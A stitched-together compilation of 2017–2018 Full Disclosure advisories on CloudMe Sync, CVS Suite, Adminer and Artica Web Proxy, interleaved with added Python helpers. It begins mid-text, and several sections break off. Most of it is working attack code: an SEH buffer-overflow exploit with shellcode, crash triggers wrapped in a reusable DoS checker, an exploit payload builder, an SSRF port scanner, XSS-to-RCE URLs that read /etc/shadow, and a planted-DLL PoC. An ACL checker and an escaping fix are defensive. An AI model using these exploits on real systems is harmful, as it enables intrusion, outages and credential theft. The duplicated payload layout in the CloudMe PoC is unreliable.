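The four crash PoCs above (WebLog Expert CVE-2018-7582, Softros NTS CVE-2018-7658, SEGGER embOS/IP CVE-2018-7449 and this DualDesk CVE-2018-7583) all share one shape: reach the listener, send one trigger, and confirm the daemon is gone. Below is an added example, not any vendor's or the author's code, that wraps that procedure in a reusable check: it verifies the port accepts connections before the trigger and refuses them afterwards, so "crashed" is a measured result rather than an assumption. The trigger payloads and ports are the ones the advisories give; `FakeCrashingService` is a constructed lab stand-in so the check can be run offline.

```python
import socket
import threading
import time


def service_alive(host, port, timeout=2.0):
    """True if host:port still accepts a TCP connection."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def send_once(host, port, payload, timeout=5.0):
    """Deliver one payload over a fresh connection and hang up: all the
    WebLog Expert, Softros and DualDesk PoCs need is this."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)


def ftp_login_then(host, port, cmd, user=b"anonymous", pwd=b"anonymous", timeout=5.0):
    """The SEGGER embOS/IP PoC needs a USER/PASS exchange before the command."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)                                  # 220 banner
        s.sendall(b"USER " + user + b"\r\n"); s.recv(1024)
        s.sendall(b"PASS " + pwd + b"\r\n");  s.recv(1024)
        s.sendall(cmd)


def dos_check(host, port, trigger, settle=1.0):
    """Confirm a crash the way the advisories define it: the listener is
    reachable before the trigger and refuses connections afterwards.
    Returns 'down-before', 'crashed' or 'alive'."""
    if not service_alive(host, port):
        return "down-before"
    trigger()
    time.sleep(settle)                                # let the daemon die
    return "alive" if service_alive(host, port) else "crashed"


# Trigger builders for the four advisories; each returns a zero-arg callable.
def weblog_expert_trigger(host, port=9991):
    req = (b"GET /index.html HTTP/1.0\r\nHost: " + host.encode() + b":9991\r\n"
           b"User-Agent: Mozilla\r\nAccept: */*" + b"A" * 2000 + b"\r\n\r\n")
    return lambda: send_once(host, port, req)

def softros_nts_trigger(host, port=7001):
    return lambda: send_once(host, port, b"A" * 11)

def dualdesk_trigger(host, port=5500):
    return lambda: send_once(host, port, b"a" * 8000)

def segger_ftp_trigger(host, port=21):
    return lambda: ftp_login_then(host, port, b"STOR Bye!\r\n")


class FakeCrashingService:
    """Constructed lab stand-in, not any vendor's daemon: accepts connections
    and 'crashes' (closes its listener) once one connection delivers
    crash_len bytes or more, so dos_check can be exercised offline."""

    def __init__(self, crash_len):
        self.crash_len = crash_len
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, _ = self.sock.accept()
            except OSError:                           # listener closed
                return
            data = b""
            with conn:
                conn.settimeout(2.0)
                try:
                    while True:
                        chunk = conn.recv(65536)
                        if not chunk:
                            break
                        data += chunk
                except socket.timeout:
                    pass
            if len(data) >= self.crash_len:
                self.sock.close()                     # the "crash"
                return

    def stop(self):
        self.sock.close()


if __name__ == "__main__":
    lab = FakeCrashingService(crash_len=1000)
    h, p = "127.0.0.1", lab.port
    print("11 bytes  :", dos_check(h, p, softros_nts_trigger(h, p), settle=0.5))
    print("8000 bytes:", dos_check(h, p, dualdesk_trigger(h, p), settle=0.5))
```

Against a real target, pass the advisory's default port, e.g. `dos_check("10.0.0.9", 5500, dualdesk_trigger("10.0.0.9"))`; the `settle` delay matters because a crashing service may still accept one last connection from its backlog before the process exits.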


Network Access:
===
Remote



Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification: February 4, 2018
Second attempt : February 17, 2018
Request CVE, assigned by Mitre : March 1, 2018
March 1, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx



[FD] CVE-2018-6892 CloudMe Sync <= v1.10.9 Unauthenticated Remote Buffer Overflow

2018-02-13 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security
[+] SSD Beyond Security Submission:
https://blogs.securiteam.com/index.php/archives/3669


Vendor:
=
www.cloudme.com


Product:
===
CloudMe Sync <= v1.10.9

(CloudMe_1109.exe)
hash: 0e83351dbf86562a70d1999df7674aa0

CloudMe is a file storage service operated by CloudMe AB that offers
cloud storage, file synchronization and client software.
It features a blue folder that appears on all devices with the same
content, all files are synchronized between devices.



Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
CVE-2018-6892



Security Issue:

Unauthenticated remote attackers that can connect to the "CloudMe Sync"
client application listening on TCP port 8888 can send a malicious payload
causing a buffer overflow condition. This results in the attacker
controlling the program's execution flow and allows arbitrary code
execution on the victim's PC.

CloudMe Sync client creates a socket listening on TCP port 8888 (0x22B8)

In Qt5Core:

00564DF1   . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8
00564DF9   . 890424 MOV DWORD PTR SS:[ESP],EAX
00564DFC   . FF15 B8738100  CALL DWORD PTR DS:[<_ZN10QTc>;
 Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst


C:\>netstat -ano | findstr 8888
TCP    0.0.0.0:8888    0.0.0.0:0    LISTENING    15504
TCP    [::]:8888       [::]:0       LISTENING    15504


Buffer Overflow:

EIP register will be overwritten at about 1075 bytes.

EAX 00000001
ECX 76F698DA msvcrt.76F698DA
EDX 00000035
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141

Stack Dump:
==

(508.524): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -
eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000
eip=41414141 esp=00091474 ebp=00091494 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???

Exploitation is very easy, as ASLR and SafeSEH are both false for the
loaded modules, making the exploit portable across different operating
systems. We will therefore use a Structured Exception Handler (SEH)
overwrite for our exploit.

e.g.

6FE6909D  0x6fe6909d : pop ebx # pop esi # ret 0x20 |
{PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False,
SafeSEH: False, OS: False, v-1.0-
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
00476795  0x00476795 : pop ebx # pop esi # ret 0x20 | startnull
{PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH:
False, OS: False, v-1.0-
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
61E7B7F6  0x61e7b7f6 : pop ebx # pop esi # ret 0x20 |
{PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH:
False, OS: False, v5.9.0.0
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)


0day Exploit POC:
==
import socket, struct

print('CloudMe Sync v1.10.9')
print('Unauthenticated Remote Buffer Overflow 0day')
print('Discovery/credits: hyp3rlinx')
print('apparition security\n')


# shellcode to pop calc.exe, Windows 7 SP1
sc = (b"\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
      b"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
      b"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
      b"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
      b"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
      b"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
      b"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


ip = input('[+] CloudMe Target IP> ')

nseh = b"\xEB\x06" + b"\x90" * 2          # short JMP +6 over the SEH record into the shellcode
seh = struct.pack('<L', 0x61e7b7f6)       # POP POP RET in Qt5Gui.dll (no ASLR / SafeSEH)
junk = b"A" * 2232 + nseh + seh + sc + b"B" * 5600
payload = junk + nseh + seh + sc

def PwnMe(ip, payload):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, 8888))                 # CloudMe Sync listener, TCP 8888 (0x22B8)
    s.send(payload)
    print('Sending buffer overflow packetz')
    input()


if __name__ == '__main__':
    PwnMe(ip, payload)
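The two numbers the PoC above depends on, the nSEH offset (2232) and the POP POP RET address in Qt5Gui.dll (0x61e7b7f6), are what an exploit developer has to establish and then verify before sending anything. The following added example (not the author's code) shows the standard way to do both in Python: a Metasploit-style cyclic pattern whose aligned 4-byte windows are unique, so the dword the debugger shows in SEH gives the offset directly, and a builder that lays out the [junk][nSEH][SEH][shellcode] record plus a reader to check the record before it goes on the wire. The shellcode and total length used in the demo are placeholders.

```python
import string
import struct


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...): every aligned 4-byte window is
    unique for up to 20280 bytes, so the dword that lands in nSEH/SEH (or
    EIP) tells you the offset. Send this instead of "A"*n on the first run."""
    out = bytearray()
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def pattern_offset(seen, length=20280):
    """Offset of the 4 bytes the debugger showed (int as a little-endian
    dword, or the raw bytes) inside the pattern; -1 if not found."""
    if isinstance(seen, int):
        seen = struct.pack("<L", seen)
    return cyclic_pattern(length).find(seen)


def build_seh_payload(nseh_offset, ppr_addr, shellcode, total_len):
    """[junk][nSEH = jmp +6][SEH = pop pop ret][shellcode][pad].
    The handler address is overwritten with POP POP RET, which returns into
    nSEH; the short jump there skips the 4-byte SEH slot and lands on the
    first shellcode byte."""
    nseh = b"\xEB\x06" + b"\x90" * 2                 # jmp short +6 ; nop ; nop
    seh = struct.pack("<L", ppr_addr)
    body = b"A" * nseh_offset + nseh + seh + shellcode
    if len(body) > total_len:
        raise ValueError("shellcode does not fit in total_len")
    return body + b"B" * (total_len - len(body))


def seh_record_at(payload, nseh_offset):
    """(nSEH bytes, SEH handler address) found at that offset, for checking a
    buffer before sending it."""
    nseh = payload[nseh_offset:nseh_offset + 4]
    seh = struct.unpack("<L", payload[nseh_offset + 4:nseh_offset + 8])[0]
    return nseh, seh


if __name__ == "__main__":
    pat = cyclic_pattern(4000)
    # Constructed: pretend the debugger showed the dword at offset 2232 in SEH.
    dword_seen = struct.unpack("<L", pat[2232:2236])[0]
    print("SEH offset:", pattern_offset(dword_seen))
    payload = build_seh_payload(2232, 0x61e7b7f6, b"\xcc" * 16, 8000)
    print("record at 2232:", seh_record_at(payload, 2232))
```

`pattern_offset` works for the plain EIP overwrite the advisory mentions at about 1075 bytes as well; only the value read from the debugger changes.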



References:
https://www.cloudme.com/en/sync
https://blogs.securiteam.com/index.php/archives/3669


POC Video URL:
=
https://vimeo.com/255280060



Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
=
SSD Vulnerability submission: January 17, 2018
Would like to acknowledge Beyond Security’s SSD program for the help
with co-ordination of this vulnerability.
More details can be found on their blog at:
https://blogs.

[FD] CVS Suite 2009R2 Insecure Library Loading CVE-2018-6461

2018-02-09 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVS-SUITE-2009R2-INSECURE-LIBRARY-LOADING-CVE-2018-6461.txt
[+] ISR: Apparition Security


Vendor:
=
march-hare.com


Product:
===
WINCVS 2009R2

CVS Suite is a modern versioning system that combines the power and
stability of CVS with modern easy to use client software and support for
Configuration Management best practice. As the newest major release of
the world's most popular versioning system, CVS Suite 2009R2 continues
CVSNT's blazing pace of innovation with new features and usability enhancements.



Vulnerability Type:
===
Insecure Library Loading


CVE Reference:
==
CVE-2018-6461


Security Issue:

A non-privileged user can write files to "C:\ProgramData\March
Hare\myrepo\CVSROOT" to gain authenticated access with the same privileges
as the currently logged-on user; in addition they can run arbitrary code
with the same privileges as the victim.

e.g.

C:\ProgramData\March Hare\myrepo\CVSROOT>cacls * | more
C:\ProgramData\March Hare\myrepo\CVSROOT\CVS Everyone:(OI)(CI)F
                                             NT AUTHORITY\SYSTEM:(OI)(CI)F


WinCVS:
Attackers can place malicious DLLs in CVSROOT and wait for a CVS user to run
WinCVS; when the user browses to a repository in CVSROOT and right-clicks
CVSROOT or a CVSROOT file to 'Open in new instance' (or presses Ctrl+F2),
the attacker's DLL executes.

An attacker-supplied DLL, e.g. 'python31.dll', will also execute if placed
on the victim's desktop and the user initially opens 'wincvs2.exe'.
Basically anywhere, or any repository, we can place a malicious DLL that
they can browse to should work.

WinMerge 2009 also vulnerable:
If a WinMerge project file is opened from a remote share where
specific attacker supplied DLLs have been placed it will load and
execute it.

vuln DLL(s):

tcl87.dll
python30.dll
python31.dll

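Both the WebLog Expert authentication bypass (CVE-2018-7581) above and this CVS Suite finding come down to the same `cacls` observation: a low-privilege identity (BUILTIN\Users, Everyone) holding Change or Full on a file the product trusts. The following added example (not the vendors' or the author's code) parses `cacls *` output and flags exactly that condition. The sample listing is constructed to mirror the two advisories plus one safe file; the parser recovers the path/ACE boundary from the indentation cacls uses for continuation lines, which is what makes paths and identities containing spaces parse correctly.

```python
import re

WRITE_PERMS = {"F", "C", "W"}      # cacls shorthand: Full, Change, Write
# Identities that any local user holds; write access here is the finding.
LOW_PRIV = {"everyone", r"builtin\users", "users", "authenticated users",
            r"nt authority\authenticated users"}

# ACCOUNT:(OI)(CI)F  |  ACCOUNT:(ID)C  |  ACCOUNT:(special access:)
_ACE_RE = re.compile(
    r"^(?P<who>[^:]+?):(?P<flags>(?:\([A-Z]{1,2}\))*)"
    r"(?P<perm>[FCRWN]|\(special access:\))$")


def _split_first_line(line, indent):
    """cacls prints 'path<space>first ACE' and indents every further ACE to
    len(path)+1, so that indent recovers the boundary exactly, even when the
    path or the identity contains spaces. With a single ACE there is no
    continuation line, so fall back to the last space (wrong only for
    space-containing identities such as NT AUTHORITY\\SYSTEM on one-ACE files)."""
    if indent is not None and line[:indent].strip():
        return line[:indent].rstrip(), line[indent:].strip()
    path, _, ace = line.rstrip().rpartition(" ")
    return path.rstrip(), ace


def parse_cacls(output):
    """{path: [(identity, inherit_flags, perm), ...]} from `cacls *` output."""
    blocks, cur = [], []
    for raw in output.splitlines():
        if not raw.strip():
            continue
        if raw[:1].isspace() and cur:
            cur.append(raw)                    # continuation ACE
        else:
            if cur:
                blocks.append(cur)
            cur = [raw]
    if cur:
        blocks.append(cur)

    acls = {}
    for block in blocks:
        conts = block[1:]
        indent = (len(conts[0]) - len(conts[0].lstrip())) if conts else None
        path, first = _split_first_line(block[0], indent)
        entries = []
        for ace_text in [first] + [c.strip() for c in conts]:
            m = _ACE_RE.match(ace_text)
            if m:                              # skips "(special access:)" right lists
                entries.append((m.group("who"), m.group("flags"), m.group("perm")))
        acls[path] = entries
    return acls


def writable_by_low_priv(acls):
    """Paths on which a low-privilege identity holds F, C or W: the condition
    behind the WebLog Expert (WebServer.cfg) and CVS Suite (CVSROOT) findings."""
    hits = {}
    for path, entries in acls.items():
        bad = [(who, perm) for who, _, perm in entries
               if who.lower() in LOW_PRIV and perm in WRITE_PERMS]
        if bad:
            hits[path] = bad
    return hits


def _cacls_block(path, *aces):
    """Lay out one entry the way cacls prints it (only used to build the sample)."""
    pad = " " * (len(path) + 1)
    return "\n".join([path + " " + aces[0]] + [pad + a for a in aces[1:]])


# Constructed sample, modelled on the two advisories' listings plus one safe file.
SAMPLE_OUTPUT = "\n".join([
    _cacls_block(r"C:\ProgramData\WebLog Expert\WebServer\WebServer.cfg",
                 r"BUILTIN\Users:(ID)C", r"BUILTIN\Administrators:(ID)C",
                 r"NT AUTHORITY\SYSTEM:(ID)F", r"BUILTIN\Administrators:(ID)F"),
    _cacls_block(r"C:\ProgramData\March Hare\myrepo\CVSROOT\CVS",
                 r"Everyone:(OI)(CI)F", r"NT AUTHORITY\SYSTEM:(OI)(CI)F"),
    _cacls_block(r"C:\ProgramData\Safe App\app.cfg",
                 r"BUILTIN\Users:(ID)R", r"NT AUTHORITY\SYSTEM:(ID)F"),
])

if __name__ == "__main__":
    for path, aces in writable_by_low_priv(parse_cacls(SAMPLE_OUTPUT)).items():
        print(path, "->", aces)
```

On a live system feed it `subprocess.run(["cacls", "*"], capture_output=True, text=True).stdout` from the directory under review; `icacls` output differs in layout and is not handled here.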


References:
http://march-hare.com/cvspro/vulnwincvs.htm


Exploit/POC:
=
Create "python31.dll"

#include <windows.h>

//gcc -c python31.c
//gcc -shared -o python31.dll python31.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    /* runs as soon as the vulnerable application loads the planted DLL */
    MessageBox(NULL, "Done!", "hyp3rlinx", MB_OK);
    break;
  }

  return TRUE;
}



Network Access:
===
Remote


Severity:
=
High


Disclosure Timeline:
=
Vendor Notification: January 26, 2018
Vendor acknowledgement: January 27, 2018
Vendor releases fix: February 2, 2018
February 5, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


[FD] Adminer <= v4.3.1 Server Side Request Forgery

2018-01-16 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: apparition security



Vendor:
==
www.adminer.org


Product:

Adminer <= v4.3.1

Adminer (formerly phpMinAdmin) is a full-featured database management
tool written in PHP. Unlike phpMyAdmin, it consists of a single file ready
to deploy to the target server. Adminer is available for MySQL, PostgreSQL,
SQLite, MS SQL, Oracle, Firebird, SimpleDB, Elasticsearch and MongoDB.
https://github.com/vrana/adminer/releases/


Vulnerability Type:
===
Server Side Request Forgery


CVE Reference:
==
N/A


Security Issue:

Adminer allows unauthenticated connections to be initiated to arbitrary
systems/ports. This vulnerability can be used to bypass firewalls, identify
internal hosts and port-scan other servers for reconnaissance. Notably,
Adminer throttles invalid login attempts but allows endless unauthorized
HTTP connections to other systems, as long as you are not trying to
authenticate to Adminer itself.

In situations where Adminer can talk to a server that we are not allowed to
reach (ACL) and we can talk to the server hosting Adminer, it can do the
recon for us.

Recently on a LAN I was firewalled off from a server; however, I could talk
to another server running Adminer, and that Adminer server could talk to the
target. Since Adminer suffers from Server-Side Request Forgery, I could scan
for open ports and gather information from that firewalled-off, protected
server. This allowed me not only to bypass the ACL but also to hide from the
threat detection system (IDS) monitoring east-west connections.

However, sysadmins who check the logs on the server hosting the Adminer
application will see our port scans.

root@lamp log/apache2# cat other_vhosts_access.log
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:25:11 +0000] "GET ///?server=TARGET-IP:21= HTTP/1.1" 403 1429 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:24 +0000] "GET ///?server=TARGET-IP:22= HTTP/1.1" 403 6019 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:56 +0000] "GET ///?server=TARGET-IP:23= HTTP/1.1" 403 6021 "-" "-"


Details:
==
By comparing different failed error responses from Adminer when making
SSRF bogus connections, I figured out which ports are open/closed.

Port open ==> Lost connection to MySQL server at 'reading initial
communication packet
Port open ==> MySQL server has gone away
Port open ==> Bad file descriptor
Port closed ==> Can't connect to MySQL server on '';
Port closed ==> No connection could be made because the target machine
actively refused it
Port closed ==> A connection attempt failed.

This worked so well for me I wrote a quick port scanner 'PortMiner' as
a proof of concept that leverages Adminer SSRF vulnerability.


PortMiner observations:
==
No response 'read operation timed out' means the port is possibly open
or filtered and should be given a closer look if possible. This seems
to occur when scanning
Web server ports like 80, 443. However, when we get error responses
like the ones above from the server we can be fairly certain a port is
either open/closed.

Quick POC:
echo -e 'HTTP/1.1 200 OK\r\n\r\n' | nc -l -p 
Use range -
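The Details and PortMiner observations above amount to a classifier: each Adminer error string maps to open, closed, or open|filtered. The following added example (not PortMiner and not Adminer code) implements that mapping and a scan loop around it. How the request is issued is left to a `fetch` callable so the logic can be exercised offline: `http_fetch` issues the `?server=<host>:<port>` GET seen in the access log above and keeps the body of 403 responses, which is where Adminer puts the error text; `fake_fetch` and `FAKE_RESPONSES` are constructed stand-ins built from the error strings the advisory lists.

```python
import socket
import urllib.error
import urllib.request

MAX_TIME = 32   # same per-request timeout PortMiner uses

# Error strings Adminer reflects, as listed in the Details section above.
OPEN_MARKERS = ("Lost connection to MySQL server at 'reading initial communication packet",
                "MySQL server has gone away",
                "Bad file descriptor")
CLOSED_MARKERS = ("Can't connect to MySQL server on",
                  "No connection could be made because the target machine actively refused it",
                  "A connection attempt failed")
TIMEOUT_MARKERS = ("read operation timed out",)


def classify(body):
    """open / closed / open|filtered / unknown from one Adminer error page.
    None means the request itself timed out, which the advisory notes is what
    web ports such as 80 and 443 usually produce."""
    if body is None:
        return "open|filtered"
    text = body.lower()
    if any(m.lower() in text for m in OPEN_MARKERS):
        return "open"
    if any(m.lower() in text for m in CLOSED_MARKERS):
        return "closed"
    if any(m.lower() in text for m in TIMEOUT_MARKERS):
        return "open|filtered"
    return "unknown"


def http_fetch(url, timeout=MAX_TIME):
    """Body of the Adminer response, including 403 pages (Adminer answers the
    failed connection with 403, as the access log above shows); None on timeout."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.read().decode("utf-8", "replace")
    except (urllib.error.URLError, socket.timeout, TimeoutError):
        return None


def scan(fetch, adminer_url, target, ports):
    """{port: state}. fetch(url) -> body or None; the URL carries
    server=<target>:<port> as in the log lines above."""
    return {port: classify(fetch(f"{adminer_url}?server={target}:{port}"))
            for port in ports}


# Constructed responses for an offline run (no real Adminer instance).
FAKE_RESPONSES = {
    21: "<div class='error'>Lost connection to MySQL server at 'reading initial communication packet', system error: 0</div>",
    22: "<div class='error'>MySQL server has gone away</div>",
    23: "<div class='error'>Can't connect to MySQL server on '10.0.0.5' (111)</div>",
    80: None,
    8443: "<div class='error'>read operation timed out</div>",
    9000: "<html>unrelated page</html>",
}

def fake_fetch(url):
    return FAKE_RESPONSES[int(url.rsplit(":", 1)[1])]


if __name__ == "__main__":
    results = scan(fake_fetch, "http://adminer.lab/", "10.0.0.5", sorted(FAKE_RESPONSES))
    for port, state in results.items():
        print(f"{port:5d} {state}")
```

Swap `fake_fetch` for `http_fetch` and the Adminer URL for a real one to scan; as the advisory notes, every probe lands in that server's access log.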


Exploit/POC:
=
import socket,re,ssl,warnings,subprocess,time
from platform import system as system_name
from os import system as system_call

#Adminer Server Side Request Forgery
#PortMiner Scanner Tool
#by John Page (hyp3rlinx)
#ISR: ApparitionSec
#hyp3rlinx.altervista.org
#=
#D1rty0Tis says hi.

#timeout
MAX_TIME=32
#ports to log
port_lst=[]
#Web server response often times out but usually means ports open.
false_pos_ports=['80','443']

BANNER='''
   _   __  __ _
  |  _  \ | | |  \/  (_)
  | |__) |__  _ __| |_| \  / |_ _ __   ___ _ __
  |  ___/ _ \| '__| __| |\/| | | '_ \ / _ \ '__|
  | |  | (_) | |  | |_| |  | | | | | |  __/ |
  |_|   \___/|_|   \__|_|  |_|_|_| |_|\___|_|
   '''


def info():
    print("\nPortMiner depends on Error messages to determine open/closed ports.")
    print("Read operations reported 'timed out' may be open/filtered.\n")


def greet():
    print('Adminer Unauthenticated SSRF Port Scanner Tool')
    print('Targets Adminer used for MySQL administration\n')
    print('by hyp3rlinx - apparition security')
    print('-\n')
    print('Scan small ranges or single ports or expect to wait.\n')
    print('Do not scan networks without authorized permission.')
    print('Author not responsible for abuse/misuse.\n')


def chk_port

[FD] Artica Web Proxy v3.06 Remote Code Execution / CVE-2017-17055

2017-12-01 Thread hyp3rlinx
[+] Credits: John Page (aka Hyp3rlinX)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
[+] ISR: ApparitionSec



Vendor:
===
www.articatech.com



Product:
=
Artica Web Proxy v.3.06.112216


Artica Tech offers a powerful but easy-to-use Enterprise-Class Web
Security and Control solution,
usually the preserve of large companies. ARTICA PROXY Solutions have
been developed over the past
10 years as an Open Source Project to help SMEs and public bodies
protect both their organizations
and employees from risks posed by the Internet.



Vulnerability Type:
===
Remote Code Execution



CVE Reference:
==
CVE-2017-17055



Security Issue:
===
Artica offers a web-based command line emulator, 'system.terminal.php'
(a shell), that allows authenticated users to execute OS commands as root.
However, Artica fails to sanitize the HTTP request parameter
$_GET["username-form-id"] used in 'freeradius.users.php'.

Therefore, when an authenticated user clicks an attacker-supplied link or
visits a malicious webpage, attacker-supplied JavaScript executes in that
user's session. That JavaScript is then used to execute unauthorized
operating system commands (RCE) on the affected Artica Web Proxy server
by abusing the system.terminal.php functionality. The result is attacker
takeover of the Artica server.



Exploit/POC:
=
1) Steal artica Server "/etc/shadow" password file.
https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E

2) Write file 'PWN' to /tmp dir.
https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E
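The POC above starts its payload with </script><script>, closing the inline script block the parameter is echoed into, which is why plain HTML-entity escaping is not the right fix for a value that lands in script context. The following is an added example, not Artica's code: it contrasts a template that echoes username-form-id raw with one that emits it as a JSON/JavaScript string literal with every '<' encoded, plus a small check that counts closing script tags; the template shape is an assumption.

```python
import json
import urllib.parse

# Start of the page's POC payload once URL-decoded: it terminates the
# inline script block the value is echoed into and opens a new one.
POC_PREFIX = '</script><script>var xhr=new XMLHttpRequest();'

# Assumed shape of the page: the parameter ends up inside a <script>.
TEMPLATE = '<script>\nvar formId = %s;\n</script>'


def decode_param(query, name):
    """URL-decode one parameter from a raw query string."""
    return urllib.parse.parse_qs(query).get(name, [''])[0]


def render_vulnerable(username_form_id):
    """The parameter is dropped into a JS string with only quotes around it;
    a '</script>' inside it ends the block as far as the HTML parser is
    concerned, no matter what JavaScript syntax rules say."""
    return TEMPLATE % ('"%s"' % username_form_id)


def js_string_literal(value):
    """Encode value as a JavaScript string literal that is also safe in an
    HTML <script> block: json.dumps handles quotes, backslashes and control
    characters, and every '<' becomes the escape \\u003c so the HTML
    tokenizer can never see '</script>' or '<!--' inside the literal."""
    return json.dumps(value).replace('<', '\\u003c')


def render_hardened(username_form_id):
    return TEMPLATE % js_string_literal(username_form_id)


def script_breakout(page_html):
    """Detection check: a page built from TEMPLATE has exactly one closing
    script tag; any other count means the value escaped its context."""
    return page_html.lower().count('</script>') != 1
```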


Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: November 28, 2017
Vendor Confirms Vulnerability : November 28, 2017
Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017
December 1, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Mist Server v2.12 Unauthenticated Persistent XSS CVE-2017-16884

2017-12-01 Thread hyp3rlinx
[+] Credits: John Page (aka Hyp3rlinX)  
[+] Website: hyp3rlinx.altervista.org
